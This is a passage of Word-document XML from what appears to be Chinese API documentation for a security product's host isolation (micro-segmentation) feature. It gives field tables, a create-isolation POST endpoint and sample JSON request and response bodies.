          <w:p w14:paraId="7A187A46" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1817D04F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="649F2A5C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="29BEB075" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="410FAB97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11369248" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75968023" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5614FBBE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13844828" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54D0DD3A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BC3EAD6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2CE5F8E6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E0A865B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>comId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74D14532" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B587DFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>公司id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7179EC1A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D8A6CEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ipList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1281334A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01994F0A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>放行ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2A90501C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D63877F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>portList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E5207A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BFC5687" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>放行端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7981C68D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D5E1E8E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EC72C5E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59FDD283" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>协议，*表示tcp和udp都支持</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1028DF02" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02AAFCB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>updatedTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74ACFAAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B1999AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2E841361" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B0017D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D9E3000" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58A434A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="51C43E86" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BE832A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35EAFB6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12BC02CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务状态：1隔离中 2隔离成功 3隔离失败 4修改中 5修改失败 6解除中 7解除失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4AB2DFFC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="709F8287" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="325F6BCE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11B793EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作类型， micro_segmentation_add:新增， micro_segmentation_edit：修改 ，micro_segmentation_del：删除</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="78535AD7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B47AE2C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17F1AFD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DF3AD7D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>错误描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0F599646" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30D0E06B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>direction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="583E3B84" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="667E1E34" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>隔离方向,in:入站，out：出站，all：全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7AE6A5B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="217" w:name="创建隔离接口"/>
      <w:bookmarkEnd w:id="216"/>
      <w:r>
        <w:t>创建隔离接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6F3BDB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F58488E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/ms-srv/api/segmentation/create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E43D22"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6"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="3835"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="52331E4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70A417B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F7ED662" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FF3717A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7955232B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="080F6939" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E1CAAB6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CCDCEB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E7F86E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D678968" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机Id数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3032BFE5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52446EB9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>direction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26587FD5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C2CD2F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EA522BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>隔离方向,in:入站，out：出站，all：全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="23E4ABEA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25F88B1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ipList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AFD7F9F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A15D76A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32F609DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>放行ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="07128AF4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16A400EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>portList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CC48AE5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B114444" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3074ACB6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>放行端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7386A2B5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D695508" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CEFFC0E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DA59182" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73CBFBC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F1CFA8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C4FCB7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "agentIds":["5fa27259dae9af8a"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remark":"123456",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "direction":"out",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ipList":["192.168.1.100","172.16.2.187"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "portList":["80","81","82"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511FDE3B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9D70E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorDesc": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0900FDE0"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="014E8AD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6183772" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A13C550" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1385710C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="30A078CF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D3022E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AB7F3D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E12C1C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2B8BA619" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="174779BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C1607A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
